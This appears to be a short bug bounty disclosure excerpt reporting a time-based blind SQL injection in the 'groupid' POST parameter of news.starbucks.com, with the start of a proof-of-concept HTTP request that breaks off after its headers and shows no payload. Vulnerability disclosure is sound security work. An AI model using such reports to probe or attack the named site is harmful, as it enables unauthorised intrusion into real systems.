Starbucks: Time-based Blind SQLi on news.starbucks.com
Hi, I just found that the post parameter "groupid" for a particularly crafted http request is being vulnerable to injection due to missing parameter sanitization. PoC: POST / HTTP/1.1 Host: news.starbucks.com Connection: close Content-Length: 81 Cache-Control: max-age=0 Origin:...